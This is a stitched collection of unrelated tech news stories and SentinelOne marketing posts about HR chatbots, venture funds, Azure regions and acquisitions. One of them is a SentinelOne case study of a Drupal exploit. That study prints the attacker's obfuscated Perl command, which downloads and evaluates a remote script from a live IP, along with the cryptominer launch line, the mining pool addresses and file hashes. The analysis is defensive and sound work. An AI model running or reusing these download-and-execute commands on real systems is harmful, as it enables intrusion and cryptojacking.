Leena AI builds HR chatbots to answer policy questions automatically

Say you have a job with a large company and you want to know how much vacation time you have left, or how to add your new baby to your healthcare. This usually involves emailing or calling HR and waiting for an answer, or it could even involve crossing multiple systems to get what you need.

Leena AI, a member of the Y Combinator Summer 2018 class, wants to change that by building HR bots to answer questions for employees instantly.

The bots can be integrated into Slack or Workplace by Facebook and they are built and trained using information in policy documents and by pulling data from various back-end systems like Oracle and SAP.

Adit Jain, co-founder at Leena AI, says the company has its roots in another startup called Chatteron, which the founders started after they got out of college in India in 2015. That product helped people build their own chatbots. Jain says along the way, they discovered while doing their market research a particularly strong need in HR. They started Leena AI last year to address that specific requirement.

Jain says when building bots, the team learned through its experience with Chatteron that it’s better to concentrate on a single subject because the underlying machine learning model gets better the more it’s used. “Once you create a bot, for it to really add value and be [extremely] accurate, and for it to really go deep, it takes a lot of time and effort and that can only happen through verticalization,” Jain explained.

Photo: Leena AI

What’s more, as the founders have become more knowledgeable about the needs of HR, they have learned that 80 percent of the questions cover similar topics, like vacation, sick time and expense reporting. They have also seen companies using similar back-end systems, so they can now build standard integrators for common applications like SAP, Oracle and NetSuite.

Of course, even though people may ask similar questions, the company may have unique terminology or people may ask the question in an unusual way. Jain says that’s where the natural language processing (NLP) comes in. The system can learn these variations over time as they build a larger database of possible queries.

The company just launched in 2017 and already has a dozen paying customers. They hope to double that number in just 60 days. Jain believes being part of Y Combinator should help in that regard. The partners are helping the team refine its pitch and making introductions to companies that could make use of this tool.

Their ultimate goal is nothing less than to be ubiquitous, to help bridge multiple legacy systems to provide answers seamlessly for employees to all their questions. If they can achieve that, they should be a successful company.

5 Shortcuts to Speed Up Your Endpoint Security Management Process

As a SecOps professional, you likely spend a good chunk of the day managing your endpoint assets and ensuring they are secured. We understand the challenge. Managing endpoint security can be a time-consuming process. So we’re here to help!
In this post, I’ll be sharing some ways you can save time while managing your endpoints using SentinelOne.

1. Prevent Cyber Threats

There are numerous endpoint solutions on the market; many rely on cloud connectivity, some are based on reputation or similarities. For SentinelOne, all of the intelligence of our AI models is baked into a low footprint agent that automatically quarantines and mitigates malicious activity on the endpoint. The result? Users can continue working securely and uninterrupted, even if malware tries to compromise their devices.

2. Rollback and Remediate Threats

“1st layer” or pre-execution technologies might miss malware and ransomware, like file-less attempts. What then? Legacy and most-nextgen products cannot answer this question. Sadly, you won’t know until your users report problems, and you will need to quickly come up with a recovery plan to remediate. With SentinelOne, you are always just one click away from rolling back the impact, saving time by allowing users to complete their tasks without interruption.

3. Simplified management experience

In the early days of endpoint protection, many products implemented the concept of zones. The idea behind zones is to allow SecOps to configure different policies based on location. In the case of malware and ransomware, this is simpler – they are not wanted regardless of your location. By deploying the SentinelOne agent across your endpoint assets, you don’t need to worry about additional complexity based on your workforce location.

4. Visibility on all assets

Once SentinelOne is deployed across your assets, each agent automatically reports on all installed applications – for Windows, MacOS, and Linux endpoints. Unlike other products, this functionality is not dependent on ever running the actual application. From the SentinelOne console, you can schedule a risk and vulnerability report that will be emailed to recipients of your choice with executive-level insights. The report gives access to a complete list of agents and their relevant CVEs, so you can implement a real-time patch management program.

5. Automation and Orchestration

Cybercriminals are embracing automated attacks like never before. This gives them the ability to process more data in less time, jumping from database to database or network to network with relative ease. If enterprises try to eliminate threats using manual processes or ad hoc hunts, they are at a severe disadvantage. SentinelOne products were built with an API-first approach, so anything our technology does in isolation can also be orchestrated and integrated, creating unified and proactive workflows with your other security tools.


Bonus

Over to You: Does Your Endpoint Protection Platform Help You SAVE Time?

There are many more than these five ways that SentinelOne saves you time, but for this post, we’ve selected a few helpful tips. Time equals money; we have customers from all industries and sizes who are experiencing for themselves the power of our single EPP/EDR agent, and its many benefits beyond endpoint protection. We were also recognized by NSS Labs as one of the leading ROI products.

Ready for a test drive? A stronger security posture can be easy to implement and manage. Let us show you today.

The post 5 Shortcuts to Speed Up Your Endpoint Security Management Process appeared first on SentinelOne.

Facebook is using machine learning to self-tune its myriad of services

Regardless of what you may think of Facebook as a platform, they run a massive operation and when you reach their level of scale you have to get more creative in how you handle every aspect of your computing environment.

Engineers quickly reach the limits of human ability to track information to the point that checking logs and analytics becomes impractical and unwieldy on a system running thousands of services. This is a perfect scenario to implement machine learning and that is precisely what Facebook has done.

The company published a blog post today about a self-tuning system they have dubbed Sprial. This is pretty nifty and what it does is essentially flip the idea of system tuning on its head. Instead of looking at some data and coding what you want the system to do, you teach the system the right way to do it and it does it for you, using the massive stream of data to continually teach the machine learning models how to push the systems to be ever better.

In the blog post, the Spiral team described it this way: “Instead of looking at charts and logs produced by the system to verify correct and efficient operation, engineers now express what it means for a system to operate correctly and efficiently in code. Today, rather than specify how to compute correct responses to requests, our engineers encode the means of providing feedback to a self-tuning system.”

They say that coding in this way is akin to declarative code, like using SQL statements to tell the database what you want it to do with the data, but the act of applying that concept to systems is not a simple matter.

“Spiral uses machine learning to create data-driven and reactive heuristics for resource-constrained real-time services. The system allows for much faster development and hands-free maintenance of those services, compared with the hand-coded alternative,” the Spiral team wrote in the blog post.

If you consider the sheer number of services running on Facebook, and the number of users trying to interact with those services at any given time, it required sophisticated automation, and that is what Spiral is providing.

The system takes the log data, processes it through Spiral, which is connected with just a few lines of code. It then sends commands back to the server based on the declarative coding statements written by the team. To ensure those commands are always being fine tuned, at the same time, the data gets sent from the server to a model  for further adjustment in a lovely virtuous cycle. This process can applied locally or globally.

The tool was developed by the team operating in Boston, and is only available internally inside Facebook. It took lots of engineering to make it happen, the kind of scope that only Facebook could apply to a problem like this (mostly because Facebook is one of the few companies that would actually have a problem like this).

Ransomware Awareness and Employee Training Programs are Becoming Board Level Priorities

During our first release of findings from the SentinelOne Global Ransomware Report 2018, we highlighted key findings as to why organizations felt they were the victim of a ransomware attack, how confident they are in defending against future attacks, and why.

With 53% of U.S. respondents blaming legacy AV for failed ransomware defense and 68% of this group feeling confident in defending against future attacks due to the replacement of legacy AV with next-gen protection, the necessity of advanced technology in modern defense was plain to see.

We now are releasing our second wave of findings from the survey, focusing on increased board level involvement in organizational defense, the increased sophistication of attacks and payment demands, and the desire for enhanced law enforcement efforts.

Organizational Security is a Top Board Level Priority

With more than half (56%) of U.S. organizations indicating they are implementing employee training and awareness programs at the board level, findings show the necessity of increased board level awareness and involvement for effective organizational security:

  • 37% of board members responded that their general attack concern level has increased.
  • 49% of boards at U.S. companies are increasing security budgets to thwart ransomware attacks.
  • 38% of board respondents are more frequently getting involved at the ground level with implementation of security processes, policies and protocols.

Cyber Criminals are Evolving with More Effective Attacks and Payment Demands

Findings provide strong evidence that cyber criminals are improving their craft by infecting organizations with faster spreading, more sophisticated and highly debilitating ransomware attacks, and are also requesting evolved payment methods to mitigate legal risk:

  • 42% of respondents recognized a faster speed of ransomware infection.
  • 43% noted a greater scale of infection – citing lateral movement across networks, not simply isolated to the endpoint.
  • 33% feel ransomware attacks have become more targeted vs. opportunistic.
  • 53% indicated attackers are demanding payments in the form of cryptocurrencies.

Companies Desire Tougher Stance from the Law Against Cyber Criminals

The research also reveals that the majority of IT Security professionals would like to see more resources for law enforcement agencies to track down cyber criminals, to protect organizations and citizens against ransomware attacks:

  • 70% of U.S. companies desire greater resources for law enforcement agencies to track down cyber criminals.
  • 57% of respondents feel laws need to catch up to modern cyber-crime activity, and impose tougher sentences on criminals.
  • There is also desire for greater international cooperation between countries, expressed by 58% of respondents.

These findings, coupled with initial findings, clearly show that although next-gen technology is paramount in defending against modern attacks, there also needs to be a shift in the organization’s frame of mind. In today’s hostile threat landscape, cyber security needs to be a top priority for every member of an organization, from board and C-level down to individual employees.

The post Ransomware Awareness and Employee Training Programs are Becoming Board Level Priorities appeared first on SentinelOne.

IQ Capital is raising £125M to invest in deep tech startups in the UK

The rapid pace of technology innovation and applications in recent decades — you could argue that just about every kind of business is a “tech” business these days — has spawned a sea of tech startups and larger businesses that are focused on serving that market, and equally demanding consumers, on a daily basis. Today, a venture capital firm in the UK is announcing a fund aimed at helping to grow the technologies that will underpin a lot of those daily applications.

Cambridge-based IQ Capital is raising £125 million ($165 million) that it will use specifically to back UK startups that are building “deep tech” — the layer of research and development, and potentially commercialised technology, that is considered foundational to how a lot of technology will work in the years and decades to come. So far, some £92 million has been secured, and partner Kerry Baldwin said that the rest is coming “without question” — pointing to strong demand.

There was a time when it was more challenging to raise money for very early stage companies working at the cusp of new technologies, even more so in smaller tech ecosystems like the UK’s. As Ed Stacey, another partner in the firm acknowledges, there is often a very high risk of failure at even more stages of the process, with the tech in some cases not even fully developed, let alone rolled out to see what kind of commercial interest there might be in the product.

However, there has been a clear shift in the last several years.

There a lot more money floating around in tech these days — so much so that it’s created a stronger demand for projects to invest in. (Another consequence of that is that when you do get a promising startup, funds are potentially giving them hundreds of millions and causing other disruptions in how they grow and exit, which is another story…)

And while there are definitely a lot of startups out there in the world today, a lot of them are what you might describe as “me too”, or at least making something that is easily replicated by another startup, making the returns and the wins harder to find among them.

A new focus that we are seeing on “deep tech” is a consequence of both of those trends.

“The low-hanging fruit has been discovered… Shallow tech is a solved problem,” Stacey said, in reference to areas like the basics of e-commerce services and mobile apps. “These are easy to build with open source components, for example. It’s shallow when it can be copied very quickly.”

In contrast, deep tech is “by definition is something that can’t easily be copied,” he continued. “The underlying algorithm is deep, with computational complexity.”

But the challenges run deep in deep tech: not only might a product or technology never come together, or find a customer, but it might face problems scaling if it does take off. IQ Capital’s focus on deep tech is coupled with the company trying to  determine which ideas will scale, not just work or find a customer. As we see more deep tech companies emerging and growing, I’m guessing scalability will become an ever more prominent factor in deciding whether a startup gets backing.

IQ Capital’s investments to date span areas like security (Privitar), marketing tech (Grapeshot, which was acquired by Oracle earlier this year), AI (such as speech recognition API developer Speechmatics) and biotechnology (Fluidic Analytics, which measures protein concentrations), all areas that will be the focus of this fund, along with IoT and other emerging technologies and gaps in the current market.

IQ Capital is not the only fund starting to focus on deep tech, nor is its portfolio the only range of startups focusing on this (Allegro.AI and deep-learning chipmaker Hailo are others, to name just two).

LPs in this latest fund include family offices, wealth managers, tech entrepreneurs and CEOs from IQ’s previous investments, as well as British Business Investments, the commercial arm of the British Business Bank, the firm said.

Intermix.io looks to help data engineers find their worst bottlenecks

For any company built on top of machine learning operations, the more data it has, the better it is off — as long as it can keep it all under control. But as more and more information pours in from disparate sources, gets logged in obscure databases and is generally hard (or slow) to query, the process of getting that all into one neat place where a data scientist can actually start running the statistics is quickly running into one of machine learning’s biggest bottlenecks.

That’s a problem Intermix.io and its founders, Paul Lappas and Lars Kamp, hope to solve. Engineers get a granular look at all of the different nuances behind what’s happening with some specific function, from the query all the way through all of the paths it’s taking to get to its end result. The end product is one that helps data engineers monitor the flow of information going through their systems, regardless of the source, to isolate bottlenecks early and see where processes are breaking down. The company also said it has raised seed funding from Uncork Capital, S28 Capital, PAUA Ventures along with Bastian Lehman, CEO of Postmates and Hasso Plattner, founder of SAP.

“Companies realize being data driven is a key to success,” Kamp said. “The cloud makes it cheap and easy to store your data forever, machine learning libraries are making things easy to digest. But a company that wants to be data driven wants to hire a data scientist. This is the wrong first hire. To do that they need access to all the relevant data, and have it be complete and clean. That falls to data engineers who need to build data assembly lines where they are creating meaningful types to get data usable to the data scientist. That’s who we serve.”

Intermix.io works in a couple of ways: First, it tags all of that data, giving the service a meta-layer of understanding what does what, and where it goes; second, it taps every input in order to gather metrics on performance and help identify those potential bottlenecks; and lastly, it’s able to track that performance all the way from the query to the thing that ends up on a dashboard somewhere. The idea here is that if, say, some server is about to run out of space somewhere or is showing some performance degradation, that’s going to start showing up in the performance of the actual operations pretty quickly — and needs to be addressed.

All of this is an efficiency play that might not seem to make sense at a smaller scale. The waterfall of new devices that come online every day, as well as more and more ways of understanding how people use tools online, even the smallest companies can quickly start building massive data sets. And if that company’s business depends on some machine learning happening in the background, that means it’s dependent on all that training and tracking happening as quickly and smoothly as possible, with any hiccups leading to real-term repercussions for its own business.

Intermix.io isn’t the first company to try to create some application performance management software. There are others like Data Dog and New Relic, though Lappas says that the primary competition from them comes in the form of traditional APM software with some additional scripts tacked on. However, data flows are a different layer altogether, which means they require a more unique and custom approach to addressing that problem.

Microsoft launches two new Azure regions in China

Microsoft today launched two new Azure regions in China. These new regions, China North 2 in Beijing and China East 2 in Shanghai, are now generally available and will complement the existing two regions Microsoft operates in the country (with the help of its local partner, 21Vianet).

As the first international cloud provider in China when it launched its first region there in 2014, Microsoft has seen rapid growth in the region and there is clearly demand for its services there. Unsurprisingly, many of Microsoft’s customers in China are other multinationals that are already betting on Azure for their cloud strategy. These include the likes of Adobe, Coke, Costco, Daimler, Ford, Nuance, P&G, Toyota and BMW.

In addition to the new China regions, Microsoft also today launched a new availability zone for its region in the Netherlands. While availability zones have long been standard among the big cloud providers, Azure only launched this feature — which divides a region into multiple independent zones — into general availability earlier this year. The regions in the Netherlands, Paris and Iowa now offer this additional safeguard against downtime, with others to follow soon.

In other Azure news, Microsoft also today announced that Azure IoT Edge is now generally available. In addition, Microsoft announced the second generation of its Azure Data Lake Storage service, which is now in preview, and some updates to the Azure Data Factory, which now includes a web-based user interface for building and managing data pipelines.

Drupal Exploit on Linux – SentinelOne Detection and Response Case Study

Introduction

SentinelOne Vigilance is a managed service provided by a group of highly trained cyber security analysts. It offers another layer of security to IT teams by accelerating the detection, prioritization, and response to advanced cyber threats and reducing the risk of missing a critical alert that goes undetected. The Vigilance analysts assess the suspicious alerts, review raw threat data, process operations, and network connections, and analyze samples, as needed. They also correlate the information with threat intelligence feeds, analyze low level log data, and collaborate with security researchers to identify and prioritize events. Quite often the group investigates interesting cases. A recent Vigilance case is the subject of this article.

Recently, SentinelOne was called in by a partner to assist a company in analyzing an attack that was still going on. They knew that they were compromised in some way, and that they were still under attack, but they didn’t know much more than that. At this stage, the findings included some Linux servers showing weird CPU utilization and some Perl scripts running. So for the first step, we suggested that they install our SentinelOne agent on the Linux servers, and at the same time, involve our Vigilance team to analyze the samples, uncover the details behind the attack, and suggest a method to disinfect the systems.

Detection and Response

Once installed, the agent successfully detected the threat in no time. This Linux machine was infected by an exploit of the Drupal vulnerability (CVE-2018-7602), which resulted in running a shell command line. The command line downloads a Perl script from a remote server and executes it. The agent detected this command line as malicious due to its structure and behavior.

Figure 1. – Perl script is detected as a threat

On the infected machine, we observed a large number of Perl scripts running with the monero7 parameter.

Figure 2. – Multitude of cryptominers running on an infected Linux machine

From the logs, we can see the syntax that was used:

sh -c p$(printf e)rl -e 'BEGIN{$0=$$};use IO::Socket::INET;if(my$c=new IO::Socket::INET(PeerAddr=>"147.52.43.159:80")){print $c $_."rn" for (q{GET /sites/z.html HTTP/1.1},q{Host:147.52.43.159},q{User-Agent: Mozilla/5.0},q{});my$x;{local$/=undef;$x=};while($x=~s/(.*)rn//){last if$x=~/^$/;}eval($x);}'

This entry shows that the machine is making  a socket connection to ‘147.52.43.159’ using port ’80’ and issuing a ‘GET’ request to ‘/sites/z.html’ which is actually a Perl script. The beginning of the command also discloses this piece of information:

sh -c p$(printf e)rl

While semi obfuscated, this is simply the shell executing ‘Perl’ with the ‘e’ replaced with a sub command of ‘printf e’: sh -c perl. This method is used to hide malicious scripts from detection.

The next step of the investigation is to verify the server is up and get the requested file:

$: curl -I 147.52.43.159/sites/z.html

We know from the logs that ‘z.html’ is executed via Perl and looking at the file shows it is truncated into one line of code. Some reformatting is applied to make the code readable:

$: sed -e $'s/;/;n/g' z.html

This command returns a slightly easier Perl code to read. While reviewing the code, we spotted a large chunk of hex code, which is the cryptominer:

sub { my $GIg = '1f8b08005848fc5a0003acdc0d90dbc579c7f1bf0ffb2c63b0c54b40256e102e2fe2ad918d038224208c0d0731a0605e0438399d8fb365e21761df611908889497830e54e5551062145288201346a494516886280c655420a00249142099ff50302a3120de8c0003bdf3fed6a06fb430a5dcccf94e1f3f7a76f7d9d5fe753add5e347fc1d13d132678f6631bef706ffcd6e889c6e2f2caf29db7c6c4bd98d73bf66fc8db754bec24cffd71ecf33b757cf5bc...

Some other 15 chunks of hex code were found. They look like objects that the cryptominer loads. Here is a fraction of one of them:

push @M, $_ for ( sub { my @BnM = ('1f8b08005648fc5a0003ed586f6c5b5715bf761cc76912c78ca64dff40bdd14ec9602674a4eaba85c5e9bf97c943a149aa00cdde9eed97d88b63bbcf2f8d1ba00bcb3ad5f25255fb805a01d20412d234c43a4d42ddf6818c942e12420a0ca67c405bb531b0594503152393ba9873efbb27beef364f9dc407f8c0b59e7ff7fcee39f79efbf7dcf79e381839e4...

These chunks look interesting, so we wrote a small Python script to convert the hex string to binary. After running the extractor, we had 16 binary files.  To get the exact file type, we ran this command:

$: for f in {0..15}; do file $f; done

gzip compressed data, last modified: Wed May 16 15:03:50 2018, from Unix

After unzipping the GZIP files, we got the original files. Checking file type again revealed that these are 64-bit ELF files.

ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked

The large chunk is confirmed to be cryptominer. It is also known to VirusTotal. We recommend blacklisting the cryptominer and its zipped version. The other chunks are ELF objects which are loaded in runtime by the Perl script. We recommend blacklisting these ELF objects and their corresponding zipped versions as well.

Here is the full list of hashes of the Perl script, the ELF and the GZIP files. All of them should be entered to a blacklist.

  • 033e78cfb8c9c91e0eeb9174a7c2f551aa27fe71 – Perl script
  • 37faefefead49b36d19894f87233072464fa55df  – ELF cryptominer
  • 6b709126f5621ec3b04c12aacc7dd3803acdd6b8  – Zipped version of the cryptominer

These are the ELF objects and their zipped versions:

  • 34e2df62adfcbfbba39c74cce50f734bb284f3b3
  • ed816cf0af6b0627169f67ca2492d7e4ec0e275d
  • 471026a4954e16e203a859c5df02cdd2cc6e3e7b
  • 8108be495ea194d796623dfb8358da24605a69f7
  • 2a87dcfcfcdc4ce17b7e1655bb2f7c2ef7505885
  • bf2cc8ac57bc761466b39b98bb39d4ac54a4d501
  • 7d08e8e99f6f705bcea01344165fe9eee6ea3032
  • 8554a3b4bebd96ec3d1aebe9a0377a2d33ea4a46
  • aaf8a7610de4d52e4776c9a31351c43ddceec8e8 
  • 269b8aa8cb380b84d8a027e33f545348aad39e0e 
  • 152e70ebb75afce96064ad200292e0d593123c72
  • d693a5eeb905dba9999970d09fbe7b010a6fa47c
  • d2aa8367d07b20b023abc9c09c06798c85c83e63
  • a822a9a3585010305ebd011e4ed067bc8d94bb26
  • 251bad0a90f19e58350f5e380a248f57c7ec6325
  • 1e0860b7ac5670592401f39ed2381ec35113f48f 
  • 7b738f7d3af04ca0f557b8dd70785dde68578cb0
  • ebc08466d16fadeac8b58bec88b12167d3fe8889
  • 7b738f7d3af04ca0f557b8dd70785dde68578cb0
  • ebc08466d16fadeac8b58bec88b12167d3fe8889
  • 8a71a8a6bf3699190885ec385e3c7f4d880234d1 
  • 234921f046db70257eec90b4b340521035b4a29e
  • bee2858e02b05ed5c5e9b2b6f9e4dc6bb513d005
  • 8c8c1cde5d2cdaa25049ffee03793f3c97bf6eae 
  • 7aa3def6bb77003d162a93336db6b830ebebf1ef
  • fefe0846e5030608b2c8b1728a7c8f190af0bc81
  • 57cba985f16fc9f7b0441fd42b4c60dec10415f3
  • 3d52ac0ecce42a28487a4a13c261a86f84b6afbd
  • 4279c71c5e7c0b0253b5a04762ef13ab9d8e66a6
  • 18e5ba9f0c9f794839bdcabcb67ca7e67676fecf 

In runtime, the Perl script runs the cryptominer, while randomizing the server to communicate with, using this code:

exec $HyO "$0", '-o', $oAN[rand @oAN].':'. 80, '-u', '4AY7VG9J4VBTmuUdCMDZsY359wNHyqiQzaPzyDSLAwQheUX5om9tpVj3czoCPte9E5HDj2XbawvEQ5RaMYJjdK7US3mN6wA', '-p', "''", '-r', "''", '--currency', 'monero7';

Here is the list of servers as detailed inside the Perl script:

  • 163.172.226.137
  • 163.172.207.198
  • 163.172.204.219
  • 163.172.207.71
  • 163.172.204.213
  • 163.172.207.69
  • 163.172.205.136

The resulting command line is exactly what is observed in Figure 2, shown above.

Summary

The attack starts with exploiting the Drupal vulnerability (CVE-2018-7602) . The shell command which is run by the Apache worker, downloads a Perl script, disguised as an HTML file and runs it. The Perl script includes 16 hex chunks embedded in it, where the large one is the cryptominer. The others are ELF objects which are loaded in runtime by the Perl script. The script runs the cryptominer while randomizing the target server.

With SentinelOne agent installed, we were able to stop the attack and remediate the infected machines. With the Vigilance managed service we uncovered the details behind it.

The post Drupal Exploit on Linux – SentinelOne Detection and Response Case Study appeared first on SentinelOne.

Ping Identity acquires stealthy API security startup Elastic Beam

At the Identiverse conference in Boston today, Ping Identity announced that it has acquired Elastic Beam, a pre-Series A startup that uses artificial intelligence to monitor APIs and help understand when they have been compromised.

Ping also announced a new product, PingIntelligence for APIs, based on the Elastic Beam technology. They did not disclose the sale price.

The product itself is a pretty nifty piece of technology. It automatically detects all the API IP addresses and URLs running inside a customer. It then uses artificial intelligence to search for anomalous behavior and report back when it finds it (or it can automatically shut down access depending on how it’s configured).

“APIs are defined either in the API gateway because that facilitates creation or implemented on an application server like node.js. We created a platform that could bring a level of protection to both,” company founder Bernard Harguindeguy told TechCrunch.

It may seem like an odd match for Ping, which after all, is an enterprise identity company, but there are reasonable connections here. Perhaps the biggest is that CEO Andre Durand wants to see his company making increasing use of AI and machine learning for identity security in general. It’s also worth noting that his company has had an API security product in its portfolio for over five years, so it’s not a huge stretch to buy Elastic Beam.

With this purchase, Ping has not only acquired some advanced technology, it has also acqui-hired a team of AI and machine learning experts that could help inject the entire Ping product line with AI and machine learning smarts. “Nobody should be surprised who has been watching that Ping will drive machine learning AI and general intelligence into our identity platform,” Durand said.

Harguindeguy certainly sees the potential here. “I think we can over time bring a high level of monitoring and intelligence to Ping to understand whether an identity may have been used by someone else or being misused somehow,” he said.

Elastic Beam interface. Photo: Elastic Beam website

Harguindeguy will join Ping Identity as Senior Vice President of Intelligence along with his entire team. Neither company would divulge the exact number of employees, but Durand did acknowledge it fell somewhere between the 11 and 50 mentioned in the company Crunchbase profile. The original team consisted of around 10 according to  Harguindeguy and they have been hiring for some time, so fair to say more than 11, but less than 50.

Harguindeguy says they were pursued by more than one company (although he wouldn’t say who those other companies were), but he felt that Ping provided a good cultural match for his company and could take them where they wanted to go faster than they could on their own, even with Series A money.

“We realized this is going to be really big. How do we go after the market really strongly really fast? We saw that we could fuse this really fast with Ping and have strong go to market with them,” he said.

Durand acknowledged that Ping, which was itself acquired by Vista Equity Partners for $600 million two years ago, couldn’t have made such an acquisition without the backing of a larger firm like this. “There was there was no chance we could have done either UnboundID (which the company acquired in August 2016) or Elastic Beam on our own. This was purely an artifact of being part of the Vista family portfolio,” he said.

PingIntelligence for APIs, the product based on Elastic Beam’s technology, is currently in private preview. It should be generally available some time later this year.

Celonis scores $50M Series B on $1B valuation

In the age of digital transformation, it’s important to understand your business processes and find improvements quickly, but it’s not always easy to do without bringing in expensive consultants to help. Celonis, a New York City enterprise startup, created a sophisticated software solution to help solve this problem, and today it announced a $50 million Series B investment from Accel and 83North on a $1 billion valuation.

It’s not typical for an enterprise startup to have such a lofty valuation so early in its funding cycle, but Celonis is not a typical enterprise startup. It launched in 2011 in Munich with this idea of helping companies understand their processes, which they call process mining.

“Celonis is an intelligent system using logs created by IT systems such as SAP, Salesforce, Oracle and Netsuite, and automatically understands how these processes work and then recommends intelligently how they can be improved,” Celonis CEO and co-founder Alexander Rinke explained.

The software isn’t magic, but helps customers visualize each business process, and then looks at different ways of shifting how and where humans interact with the process or bringing in technology like robotics process automation (RPA) when it makes sense.

Celonis process flow. Photo: Celonis

Rinke says the software doesn’t simply find a solution and that’s the end of the story. It’s a continuous process loop of searching for ways to help customers operate more efficiently. This doesn’t have to be a big change, but often involves lots incremental ones.

“We tell them there are lots of answers. We don’t think there is one solution. All these little things don’t execute well. We point out these things. Typically we find it’s easy to implement, ” he said.

Screenshot: Celonis

It seems to be working. Customers include the likes of Exxon-Mobile, 3M, Merck, Lockheed-Martin and Uber. Rinke reports deals are often seven figures. The company has grown an astonishing 5,000 percent in the past 4 years and 300 percent in the past year alone. What’s more, it has been profitable every year since it started. (How many enterprise startups can say that?)

The company currently has 400 employees, but unlike most Series B investments, they aren’t looking at this money to grow operationally. They wanted to have the money for strategic purposes, so if the opportunity came along to make an acquisition or expand into a new market, they would be in a position to do that.

“I see the funding as a confirmation and commitment, a sign from our investors and an indicator about what we’ve built and the traction we have. But for us it’s more important, and our investors share this, what they really invested in was the future of the company,” Rinke said. He’s sees an on-going commitment to help his customers as far more important than a billion valuation.

But that doesn’t hurt either as it moves rapidly forward.